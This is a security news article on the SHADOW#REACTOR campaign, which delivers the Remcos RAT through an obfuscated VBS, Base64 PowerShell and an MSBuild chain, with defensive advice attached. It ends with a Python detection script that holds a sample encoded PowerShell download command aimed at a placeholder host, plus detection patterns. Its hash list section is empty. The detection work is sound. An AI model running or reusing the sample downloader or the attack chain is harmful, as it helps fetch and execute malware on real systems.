How SHADOW#REACTOR may hand over remote control of Windows systems

SHADOW#REACTOR is a multi-stage Windows malware campaign designed to stealthily deploy the Remcos remote access trojan (RAT).

A new malware campaign, SHADOW#REACTOR, is secretly installing a remote access trojan (RAT) known as Remcos that allows cybercriminals to control victims’ devices. The attack uses social engineering techniques, such as emails and fake messages, to trick victims.

The attack, discovered by Securonix, begins when the victim clicks on a malicious link sent by email or message. This initial interaction triggers the execution of an obfuscated Visual Basic script called “win64.vbs” through wscript.exe, a legitimate component of Windows. This first script sets up the subsequent stages of the attack.

Once executed, the VBS script loads and runs PowerShell code that is encoded in Base64 to make it harder to analyze. This PowerShell script then establishes communication with a remote server controlled by the attackers using System.Net.WebClient and begins downloading seemingly harmless text files called “qpwoe64.txt” or “qpwoe32.txt”, depending on whether the system is 64- or 32-bit. The files are saved to the Windows temporary directory.

The campaign employs evasive techniques such as obfuscated VBS scripts, PowerShell downloaders, text-only payload staging, and in-memory .NET loading to bypass defenses.

Infection Chain

The attack starts with wscript.exe running an obfuscated VBS launcher, which triggers a PowerShell command to fetch and reassemble encoded text payloads from remote servers. These payloads decode into a .NET Reactor-protected loader that performs anti-analysis checks before handing off to MSBuild.exe for final Remcos RAT execution. Persistence is achieved via autostart registry entries and staged files in user profiles.

Key Evasion Tactics

  • Uses living-off-the-land binaries (LOLBAS) like wscript.exe, powershell.exe, and msbuild.exe to blend with legitimate activity.
  • Relies on text files for payload fragments, fetched repeatedly until complete, to evade static analysis and sandboxes.
  • Employs Base64 obfuscation, reflective .NET loading, and ExecutionPolicy Bypass in PowerShell.

Final Payload

Remcos RAT provides attackers with remote control, including file access, command execution, and surveillance capabilities via an encrypted config. No specific threat actor is attributed yet, but it’s seen as an opportunistic, modular campaign.

Indicators of compromise for SHADOW#REACTOR

SHADOW#REACTOR involves specific indicators of compromise (IOCs) like file hashes, IPs, and behavioral patterns that security teams use to detect infections. These help identify the multi-stage campaign delivering Remcos RAT via text staging and LOLBins.

Key File Hashes

Monitor these SHA256 hashes associated with SHADOW#REACTOR payloads and loaders:

How to protect yourself

Securonix recommends some precautions that can help prevent falling for scams like this, for example:

  • Increase users’ awareness of script-based threats;
  • Educate users about the risks of running downloaded scripts and emphasize caution with unexpected files, fake “update” prompts or documents received via web downloads or untrusted sources;
  • Restrict or monitor the execution of VBS, JS, and PowerShell scripts, particularly those originating from user-writable locations such as %TEMP%, browser cache directories, or download folders;
  • Ensure that EDR solutions are able to detect suspicious behavior from script interpreters, including anomalous parent-child process chains like wscript.exe → powershell.exe → msbuild.exe, and reflective .NET assembly loading patterns;
  • Enable enhanced PowerShell logging (ScriptBlock logging, Module logging, command-line auditing) to identify heavily obfuscated, multi-step payload reconstruction activity;
  • Actively hunt for misuse of trusted binaries such as wscript.exe, powershell.exe, mshta.exe, and MSBuild.exe, especially when invoked from non-standard paths or unusual user contexts;
  • Monitor for suspicious shortcuts in the Startup folder and for the creation of seemingly benign scheduled tasks and executables written to %TEMP%, ProgramData, or user profile directories.

Mitigation Steps

Isolate affected endpoints, terminate the process chain (wscript.exe → powershell.exe → msbuild.exe), and remove staged files, registry artifacts, and Remcos binaries. Monitor for suspicious PowerShell strings, LOLBAS abuse, and HTTP traffic from scripts to untrusted IPs.
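The two detections the recommendations above and this section call for (the wscript.exe → powershell.exe → msbuild.exe process chain, and PowerShell command lines showing ExecutionPolicy Bypass, Base64 encoding and a System.Net.WebClient text download) can be expressed over process-creation telemetry. The following is an added example, not code from Securonix or the article; the events, command lines and download host are constructed and the encoded command is decoded the way PowerShell’s -EncodedCommand expects (UTF-16LE, Base64):

```python
import base64
import re
from collections import namedtuple

Event = namedtuple("Event", "pid ppid image cmd")  # Sysmon Event ID 1 style fields
MSBUILD = r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe"
# Constructed sample events; command lines are illustrative and the download host is a placeholder.
INNER = "(New-Object System.Net.WebClient).DownloadString('http://example.invalid/qpwoe64.txt')"
ENCODED = base64.b64encode(INNER.encode("utf-16-le")).decode()  # -EncodedCommand is UTF-16LE base64
SAMPLE_EVENTS = [
    Event(200, 1, r"C:\Windows\System32\wscript.exe", r'wscript.exe "C:\Users\u\Downloads\win64.vbs"'),
    Event(300, 200, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          "powershell.exe -ExecutionPolicy Bypass -enc " + ENCODED),
    Event(400, 300, MSBUILD, r"MSBuild.exe C:\Users\u\AppData\Local\Temp\proj.xml"),
    Event(500, 1, r"C:\Program Files\VS\devenv.exe", "devenv.exe"),  # benign developer build
    Event(600, 500, MSBUILD, "MSBuild.exe app.sln"),
]
CHAIN = ("wscript.exe", "powershell.exe", "msbuild.exe")  # parent -> child order from the report
PS_FLAGS = re.compile(r"-(?:executionpolicy\s+bypass|ep\s+bypass|encodedcommand|enc)\b", re.I)
DOWNLOADER = re.compile(r"System\.Net\.WebClient|DownloadString|DownloadFile|\.txt\b", re.I)

def image_name(path):
    return path.rsplit("\\", 1)[-1].lower()

def decode_encoded_command(cmd):
    # Decoded -EncodedCommand payload, or "" when the switch is absent or the data is undecodable.
    m = re.search(r"-(?:encodedcommand|enc|e)\s+([A-Za-z0-9+/=]+)", cmd, re.I)
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le") if m else ""
    except (ValueError, UnicodeDecodeError):
        return ""

def powershell_indicators(cmd):
    # Traits the report calls out: ExecutionPolicy Bypass / encoded command, WebClient .txt download.
    checks = {"execution_policy_bypass_or_encoded": PS_FLAGS.search(cmd),
              "webclient_text_download": DOWNLOADER.search(cmd + " " + decode_encoded_command(cmd))}
    return [name for name, hit in checks.items() if hit]

def find_lolbas_chains(events):
    # Each process whose grandparent -> parent -> self matches CHAIN; ordinary MSBuild use is ignored.
    by_pid = {e.pid: e for e in events}
    hits = []
    for e in events:
        parent = by_pid.get(e.ppid)
        grandparent = by_pid.get(parent.ppid) if parent else None
        names = tuple(image_name(x.image) for x in (grandparent, parent, e) if x is not None)
        if names == CHAIN:
            hits.append({"pid": e.pid, "chain": " -> ".join(names),
                         "powershell_indicators": powershell_indicators(parent.cmd)})
    return hits
```

Feeding real Sysmon or EDR process events into find_lolbas_chains flags only the MSBuild instance spawned through the scripted chain, and the indicator list tells the analyst which of the reported PowerShell traits were present.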

Gabby